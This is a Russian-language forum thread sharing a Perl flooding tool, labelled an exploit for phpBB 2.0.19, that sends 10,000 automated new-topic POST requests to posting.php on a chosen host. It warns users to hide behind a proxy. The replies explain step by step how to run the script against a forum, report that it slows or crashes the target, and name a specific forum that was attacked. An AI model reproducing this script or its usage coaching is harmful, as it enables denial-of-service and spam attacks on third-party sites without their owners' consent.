работает отлично! :D


#!/usr/bin/perl

print q{
__________________________________________________ _______________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.'


=> Exploit phpBB 2.0.19 ( by SpiderZ )
=> Topic infinitely exploit
=> Sito: www.spiderz.tk

__________________________________________________ _______________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

};

use IO::Socket;

## Initialized X
$x = 0;

## Exploit phpbb 2.0.19 SpiderZ
print q(
Exploit phpBB 2.0.19 ( by SpiderZ )

);
print q(
=> Scrivi l'url del sito senza aggiungere http & www
=> Url: );
$host = <STDIN>;
chop ($host);

print q(
=> Adesso indica in quale cartella e posto il phpbb
=> di solito si trova su /phpBB2/ o /forum/
=> Cartella: );
$pth = <STDIN>;
chop ($pth);

print q(
=> Occhio usa un proxy prima di effettuare l'attacco
=> il tuo ip verra spammato sul pannello admin del forum
=> Per avviare l'exploit scrivi " hacking "
=> );
$type = <STDIN>;
chop ($type);

## Search exploit phpbb by SpiderZ
if($type == 1){

## Search exploit phpbb by SpiderZ
while($x != 0000)
{

## Search exploit phpbb by SpiderZ
$x++;
}

## Nome attack Hacking
}
elsif ($type == hacking){

## Search exploit phpbb by SpiderZ
while($x != 10000)
{
## Invia Search exploit phpbb by SpiderZ
$postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nConnessione non riuscita: $!\n" unless $sock;

## Invia Search exploit phpbb by SpiderZ
print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## exploit phpbb by SpiderZ
syswrite STDOUT, ".";

## exploit phpbb by SpiderZ
$x++;
}
}else{

## Error Exploit phpbb
die "
Error ! riprova...
\n";
}

Насколько я понял-флудер простенький...

у меня не работает....

да и толку от него ? аналогов да е**** мени :p

не работает у меня :( и что делать , если стоит запрет время ввода сообщений каждый 10 минут например!

thanksss ;)

Ну да я ламо..ну объясните плз как его использовать поподробнее...забил понимаешь на хакинг и на те..уже нихера не понимаю)))эх...раньше всё попороще было)))

во времена счётной машинки паскаля
базаров нет

Ну да я ламо..ну объясните плз как его использовать поподробнее...забил понимаешь на хакинг и на те..уже нихера не понимаю)))эх...раньше всё попороще было)))

video нужнa ?

не...уже вроде вкурил чё и как

Эксплоит работает, но осталась пара вопросов. Например, за что отвечает секция
print q(
=> Occhio usa un proxy prima di effettuare l'attacco
=> il tuo ip verra spammato sul pannello admin del forum
=> Per avviare l'exploit scrivi " hacking "
=> );
$type = <STDIN>;
chop ($type);

народ, как рубить, так и не вкурил
запустил сплой
в 1ом меню че вписывать?
допустим сайт forum.site.ru
в первом пишу: "forum.site.ru"
вторая строчка: "/"
третья - это ваще че?
обьясните ученику :)

Ненавижу сплоеты от пауков, т.к. все указания на узбекском, хрен проссыш что надо.
Объясните чё они спрашивают при запуске своих сплоетов? Например этого

Трудно понять по скрипту?
1. вводите сервак без http, www и /
2. вводите директорию форума в виде /dir/. Если её нет, то просто /
3. это хрень какая-то. Может принимать значения 1 или hacking. Проверены оба - форум падает.

Я его откомпилировал в exe и русифицировал. Ржачная штука...

Всё сделал как ты сказал. В результате ноль реакции.
просто появляется новая командная строка вида D:\Perl\bin> и всё. Ноль реакции

А вообще сколько времени занимает работа сплоита?

Всё сделал как ты сказал. В результате ноль реакции.
просто появляется новая командная строка вида D:\Perl\bin> и всё. Ноль реакции

А вообще сколько времени занимает работа сплоита?
Уверен ли ты, что атакуемый форум уязвим? (Если можно - ссылку)
Время работы зависит от разных факторов (например, скорости сети). Пока он работает, в консоли бегает ряд точек. Окончив работу, скрипт закрывается (В случае невозможности подключения - тоже). Сейчас проверил: Насчёт пункта 3 я накосячил. У меня с 1 этот скрипт вылетел, а hacking должен сработать. Пробуй!

Эксплоит работает, но осталась пара вопросов. Например, за что отвечает секция
print q(
=> Occhio usa un proxy prima di effettuare l'attacco
=> il tuo ip verra spammato sul pannello admin del forum
=> Per avviare l'exploit scrivi " hacking "
=> );
$type = <STDIN>;
chop ($type);
гм... если я не ошибаюсь: вывод на экран заданного текста, присвоение переменной значения, введенного пользователем и урезание последнего введенного символа соответственно) (т.е. "/n")

или вопрос был про $type? :)

тогда извиняюсь, туплю)

здесь пишется про что-то, связанное с прокси.. язык итальянский, перевод с транслэйта:

=> глаз использует proxy раньше, чем осуществлять атаку
=> твой ip придет spammato на панели admin forum
=>, чтобы начать exploit ты пишешь "hacking"
=>);

Сцылка - http://game.aaanet.ru/forum/
При вводе слова хакинг просто стоит картинка, курсор мигает. И всё. И так минут 20. Под конец с матом вырубаю

Сцылка - http://game.aaanet.ru/forum/
При вводе слова хакинг просто стоит картинка, курсор мигает. И всё. И так минут 20. Под конец с матом вырубаюПроверил на 128 кб/с (валить не стал, сбросил). Да, периодически курсор останавливается, потом продолжает. И так "этапами". Потом пытался войти на форум - он тормознул заметно. Значит, сработало. Вводил так:
1. game.aaanet.ru
2. /forum/
3. hacking

Burned, спасибо. Я искал только смысл упомянутой фигни.

video нужнa ?
Да

Благодарю. То есть сплоет идёт и идёт... как бы пока не остановишь. понял. Те форумы которые я тестил - тормозились.

Благодарю. То есть сплоет идёт и идёт... как бы пока не остановишь. понял. Те форумы которые я тестил - тормозились.
Именно так. Если коннект с серваком не пропадёт, скрипт сделает 10000 проходов с паузами по паре-тройке секунд. :D